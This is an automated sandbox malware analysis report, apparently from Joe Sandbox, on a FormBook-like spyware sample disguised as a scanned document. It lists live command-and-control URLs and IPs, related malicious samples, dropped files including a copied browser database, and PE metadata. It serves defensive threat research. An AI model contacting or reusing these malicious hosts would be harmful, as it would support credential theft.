http://www.sesanu.xyz/rf25/?O2ePNNH0=7K/WA23tcmDFyzNMGH/quV9PRW4j8/nmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1hsIoixanfRydq2t2v9Un+mneZn3egUEahovskKrleZAWw==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.zucchini.pro/ajra/?O2ePNNH0=2p4airO795Dn7gjP+jvTybwKdYuaf9hxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt1dK3H8aNuBfPvyb8EJGClNEbPXCYZb+xDZ5J+2PL+Z5SA==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
https://www.myfastuploader.sbs/y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT	0%	Avira URL Cloud	safe
http://www.811371bb10.buzz/ucix/	0%	Avira URL Cloud	safe
http://www.tabyscooterrentals.xyz/l5cx/?O2ePNNH0=yQJKkfxWdg40vhwKwT0yo2Rd/5PUpL2s8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQagN3QWVkeUo3Ve4Asu3MWt+IqOvzDkO73IjfDsXnTMMww==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou/q1v9/?O2ePNNH0=metx3mUju98G7hAfRriWQtmXkGN9W+/XJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7QiThxgVyK6NCTKme3kYRuxLt+QsgneNlbuT0nXrlnHVaA==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.esscosaathi.info/u8xw/?O2ePNNH0=i8gXCJLEz0m1jkVF91XubMUJuq2NwOyQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL/uh8mRcEHcFuW3RH1uzlL0AosO+KRcAyFW3Nm3vkB9lzg==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
https://ogbos88vip.click	0%	Avira URL Cloud	safe
http://www.esscosaathi.info/u8xw/	0%	Avira URL Cloud	safe
http://www.rtp189z.lat/csd1/?O2ePNNH0=0h3WwWevRNaqBPz4X21Ll2QLu9yBncRH4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57Vgc9vjW+03TEJsYMyVopgf5EyZ5UePzu/SZcWe82Of3NdA==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexSvKA2orqVGmRjW2S5mzIhwaahGiWa+bKDQAY6jSvIIBuw==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.sql.dance/gott/?O2ePNNH0=6kpJ6LpNwGTQjQFv9wT0vKrg7LyU1Ky+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhoeiV8r7Y+8cTGMdsaGZVrW7s+26pDLbmq8chOO3l2d4Xg==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou/q1v9/	0%	Avira URL Cloud	safe
http://www.biocaracol.online/ti8p/?O2ePNNH0=MUDy3YqvL7nJjo7YRvEpL0En2kkl+QSwWlXAA27uESbLrWvg6NI8OA30BxzMmM43Wrbxd+OWoV3ymKsjfu3GM0IEaVa0LxZz/bb5MfRF8Y3qAd/qgVlf6CSQekqVEk5sbw==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.sovz.pro/vwha/	0%	Avira URL Cloud	safe
http://www.zucchini.pro/ajra/	0%	Avira URL Cloud	safe
http://www.u75lmwdgp0du.homes	0%	Avira URL Cloud	safe
http://www.u75lmwdgp0du.homes/8m3y/	0%	Avira URL Cloud	safe
http://www.sql.dance/gott/	0%	Avira URL Cloud	safe
http://www.tabyscooterrentals.xyz/l5cx/	0%	Avira URL Cloud	safe
http://www.grimbo.boats/mjs1/	0%	Avira URL Cloud	safe
http://www.rtp189z.lat/csd1/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.sovz.pro	45.130.41.107	true	true	unknown
www.sesanu.xyz	199.192.21.169	true	true	unknown
tc142-site01.mac-cdn.net	103.174.136.137	true	true	unknown
www.esscosaathi.info	15.197.240.20	true	true	unknown
myfastuploader.sbs	136.243.225.5	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
ns91.l4y.cn	38.22.89.164	true	true	unknown
rtp189z.lat	68.65.122.71	true	true	unknown
www.sql.dance	199.59.243.228	true	true	unknown
www.zucchini.pro	199.59.243.228	true	true	unknown
www.biocaracol.online	217.160.0.160	true	true	unknown
www.grimbo.boats	172.67.182.198	true	false	high
www.ogbos88.cyou	104.21.13.141	true	true	unknown
www.myfastuploader.sbs	unknown	unknown	false	unknown
www.glyttera.shop	unknown	unknown	false	unknown
www.tabyscooterrentals.xyz	unknown	unknown	true	unknown
www.usps-infora.top	unknown	unknown	false	unknown
www.u75lmwdgp0du.homes	unknown	unknown	false	unknown
www.rtp189z.lat	unknown	unknown	false	unknown
www.yacolca.digital	unknown	unknown	false	unknown
www.811371bb10.buzz	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.grimbo.boats/mjs1/?O2ePNNH0=GVh/hhHQVOm9lJhitzwoqNkD8zboxSkQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4yZhvM15q69RepVJzrWBIP8UGaM9HjMvRNhgw0A0DI7CbA==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.sesanu.xyz/rf25/	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/y3ui/	true	Avira URL Cloud: safe	unknown
http://www.sesanu.xyz/rf25/?O2ePNNH0=7K/WA23tcmDFyzNMGH/quV9PRW4j8/nmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1hsIoixanfRydq2t2v9Un+mneZn3egUEahovskKrleZAWw==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.sovz.pro/vwha/?56-H=2t2xuzpX2&O2ePNNH0=+1TlPe1iHurJgrUo1Fh4jMYCUgN6dLJjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEjTjVAEexEL7h/EXKKKoC/rP/dgEVjb+3KEnGAuUy2xLnw==	true	Avira URL Cloud: safe	unknown
http://www.zucchini.pro/ajra/?O2ePNNH0=2p4airO795Dn7gjP+jvTybwKdYuaf9hxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt1dK3H8aNuBfPvyb8EJGClNEbPXCYZb+xDZ5J+2PL+Z5SA==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.811371bb10.buzz/ucix/?O2ePNNH0=PvAg9QCS6Z5JTHKcjy7JUmQHcUGckiODdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOLFU2gGDn9aYvOg0rFqJEB5O9KgryNVgV9zNl1vTlYWlaw==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.tabyscooterrentals.xyz/l5cx/?O2ePNNH0=yQJKkfxWdg40vhwKwT0yo2Rd/5PUpL2s8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQagN3QWVkeUo3Ve4Asu3MWt+IqOvzDkO73IjfDsXnTMMww==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.811371bb10.buzz/ucix/	true	Avira URL Cloud: safe	unknown
http://www.esscosaathi.info/u8xw/?O2ePNNH0=i8gXCJLEz0m1jkVF91XubMUJuq2NwOyQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL/uh8mRcEHcFuW3RH1uzlL0AosO+KRcAyFW3Nm3vkB9lzg==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou/q1v9/?O2ePNNH0=metx3mUju98G7hAfRriWQtmXkGN9W+/XJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7QiThxgVyK6NCTKme3kYRuxLt+QsgneNlbuT0nXrlnHVaA==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.esscosaathi.info/u8xw/	true	Avira URL Cloud: safe	unknown
http://www.rtp189z.lat/csd1/?O2ePNNH0=0h3WwWevRNaqBPz4X21Ll2QLu9yBncRH4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57Vgc9vjW+03TEJsYMyVopgf5EyZ5UePzu/SZcWe82Of3NdA==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.sql.dance/gott/?O2ePNNH0=6kpJ6LpNwGTQjQFv9wT0vKrg7LyU1Ky+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhoeiV8r7Y+8cTGMdsaGZVrW7s+26pDLbmq8chOO3l2d4Xg==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou/q1v9/	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexSvKA2orqVGmRjW2S5mzIhwaahGiWa+bKDQAY6jSvIIBuw==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.biocaracol.online/ti8p/?O2ePNNH0=MUDy3YqvL7nJjo7YRvEpL0En2kkl+QSwWlXAA27uESbLrWvg6NI8OA30BxzMmM43Wrbxd+OWoV3ymKsjfu3GM0IEaVa0LxZz/bb5MfRF8Y3qAd/qgVlf6CSQekqVEk5sbw==&56-H=2t2xuzpX2	true	Avira URL Cloud: safe	unknown
http://www.sovz.pro/vwha/	true	Avira URL Cloud: safe	unknown
http://www.zucchini.pro/ajra/	true	Avira URL Cloud: safe	unknown
http://www.u75lmwdgp0du.homes/8m3y/	true	Avira URL Cloud: safe	unknown
http://www.tabyscooterrentals.xyz/l5cx/	true	Avira URL Cloud: safe	unknown
http://www.sql.dance/gott/	true	Avira URL Cloud: safe	unknown
http://www.grimbo.boats/mjs1/	true	Avira URL Cloud: safe	unknown
http://www.rtp189z.lat/csd1/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.myfastuploader.sbs/y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT	w32tm.exe, 00000004.00000002.3923068718.000000000474E000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.000000000395E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ogbos88vip.click	w32tm.exe, 00000004.00000002.3923068718.000000000442A000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.000000000363A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	w32tm.exe, 00000004.00000002.3924952824.00000000065F0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000004106000.00000004.10000000.00040000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000004F28000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000003316000.00000004.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000004138000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.u75lmwdgp0du.homes	CdarBkjFTHWBQ.exe, 00000006.00000002.3923632422.000000000525E000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.182.198	www.grimbo.boats	United States	13335	CLOUDFLARENETUS	false
136.243.225.5	myfastuploader.sbs	Germany	24940	HETZNER-ASDE	true
199.192.21.169	www.sesanu.xyz	United States	22612	NAMECHEAP-NETUS	true
15.197.240.20	www.esscosaathi.info	United States	7430	TANDEMUS	true
104.21.13.141	www.ogbos88.cyou	United States	13335	CLOUDFLARENETUS	true
199.59.243.228	www.sql.dance	United States	395082	BODIS-NJUS	true
38.22.89.164	ns91.l4y.cn	United States	21624	CYBERLYNK-PHXUS	true
45.130.41.107	www.sovz.pro	Russian Federation	198610	BEGET-ASRU	true
217.160.0.160	www.biocaracol.online	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
103.174.136.137	tc142-site01.mac-cdn.net	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
68.65.122.71	rtp189z.lat	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584837
Start date and time:	2025-01-06 16:01:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rHP_SCAN_DOCUME.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@17/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 46 Number of non-executed functions: 290
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target CdarBkjFTHWBQ.exe, PID 5428 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
10:03:00	API Interceptor	11126949x Sleep call for process: w32tm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.182.198	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
172.67.182.198	CJE003889.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/mjln/
199.192.21.169	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.technectar.top/ghvt/
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	www.technectar.top/ghvt/
	NU1aAbSmCr.exe	Get hash	malicious	FormBook	Browse	www.tophm.xyz/30rz/
	lPX6PixV4t.exe	Get hash	malicious	FormBook	Browse	www.zenscape.top/d8cw/
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	www.zenscape.top/d8cw/
	8mmZ7Bkoj1.exe	Get hash	malicious	FormBook	Browse	www.cenfresh.life/6iok/
	PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	www.selftip.top/85su/
15.197.240.20	236236236.elf	Get hash	malicious	Unknown	Browse	inversionesprofarmed.com/
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	qexyhuv.com/login.php
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	qexyhuv.com/login.php
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	qexyhuv.com/login.php
	0XLuA614VK.exe	Get hash	malicious	FormBook	Browse	www.marinamaquiagens.online/n4sv/
	8htbxM8GPX.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	qexyhuv.com/login.php
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	qexyhuv.com/login.php
	rPHOTO09AUG2024.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	new.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	85.159.66.93
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.sql.dance	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	199.59.243.227
www.grimbo.boats	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	inv#12180.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.182.198

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	https://sendbot.me/mousse-w0fysl7	Get hash	malicious	Unknown	Browse	88.198.57.50
	http://www.housepricesintheuk.co.uk	Get hash	malicious	Unknown	Browse	178.63.241.79
	getscreen-524501439-x86.exe	Get hash	malicious	Unknown	Browse	78.47.165.25
	getscreen-524501439-x86.exe	Get hash	malicious	Unknown	Browse	78.47.165.25
	getscreen-524501439.exe	Get hash	malicious	Unknown	Browse	5.75.168.191
	getscreen-524501439.exe	Get hash	malicious	Unknown	Browse	78.47.165.25
	ny9LDJr6pA.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	2.elf	Get hash	malicious	Unknown	Browse	213.133.114.151
	ZT0KQ1PC.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	116.203.13.109
	cZO.exe	Get hash	malicious	Unknown	Browse	128.140.43.40
CLOUDFLARENETUS	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://resolute-bear-n9r6wz.mystrikingly.com/	Get hash	malicious	Unknown	Browse	104.17.24.14
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.32.152
	https://sendbot.me/mousse-w0fysl7	Get hash	malicious	Unknown	Browse	104.16.79.73
	http://gleapis.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	SET_UP.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	http://jennadewanunwrapped.net	Get hash	malicious	Unknown	Browse	188.114.97.3
NAMECHEAP-NETUS	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql	Get hash	malicious	HTMLPhisher	Browse	63.250.38.199
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	http://keywestlending.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.219.248.99
	inv#12180.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	37.61.233.171
	https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.com	Get hash	malicious	HTMLPhisher	Browse	198.54.116.86

Process:	C:\Windows\SysWOW64\w32tm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fricandeaux

Download File

Process:	C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.993779653701475
Encrypted:	true
SSDEEP:	6144:rEMc5jgdh3INCoHmNMQZ8VlaJhMQIDjs23SQtHsu22ZybkA:kUM41zhMXQwtMu2Fbr
MD5:	04AE4FC266A868432B07E28BFF271C31
SHA1:	DC2731DD18DDFC0458E5F24AAB28E9E6CAA3AD9C
SHA-256:	4B06DBDEE85DBAD3B5F05EF9A489B898B7B4F839B2A724D35F9976895F17AE25
SHA-512:	1427F132C864C5506391091CAC38F11061AA09DD2591C55E13A5BA7B4AE6F33A8A4CCEC72B56F7302DC95147BE2ABCBAB3CBE5D11B4A368703575A7F1A3E888D
Malicious:	false
Reputation:	low
Preview:	...2NGGVCMAH..4K.FYX2MGG.GMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVG.AHUK+.;F.Q.l.F..l. <6.;G)>S g$7)#.<u'QkG37x[#g...m,'1 .F8L}X2MGGVG4@A.xT,.{9?.p' .]..o%S./...- .L..t5"..\%1eR.GVGMAHUEd.5F.Y3M.P..MAHUE4K5.YZ3FFLVG.EHUE4K5FYX.YGGVWMAH%A4K5.YX"MGGTGMGHUE4K5F_X2MGGVGM1LUE6K5FYX2OG..GMQHUU4K5FIX2]GGVGMAXUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGx3(9<UE4obBYX"MGG.CMAXUE4K5FYX2MGGVGmAH5E4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE4K5FYX2MGGVGMAHUE

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.412228067795977
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rHP_SCAN_DOCUME.exe
File size:	1'602'560 bytes
MD5:	fa2ead992ba2ac05214b3f586a3257bf
SHA1:	ebacda0e78fc4e856fbcbf2e94067b61654ced1f
SHA256:	06045928b7cc9bd969382bd3f473a1b0c8f8996adc0dd5c0d10dc28311f5212d
SHA512:	fbcdd0c938a3212b59b798c19f8c30a59e29c665afbe81a403bbb451592d3d10bca7c00d1f0b381341d017c458b10bef2bab2ad6f599f018769c01aabdc08aa2
SSDEEP:	24576:fqDEvCTbMWu7rQYlBQcBiT6rprG8a1eOC3ud6pmd+nYBwWIApt2/o:fTvC/MTQYxsWR7a1hh6pmd7wWBt2
TLSH:	D775D00233D1D062FFABA2334F5AF6115ABC79260123E61F1398197ABD705B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677BD054 [Mon Jan 6 12:45:08 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F6660E16483h
jmp 00007F6660E15D8Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F6660E15F6Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F6660E15F3Ah
mov dword ptr [esi], 0049FE0Ch
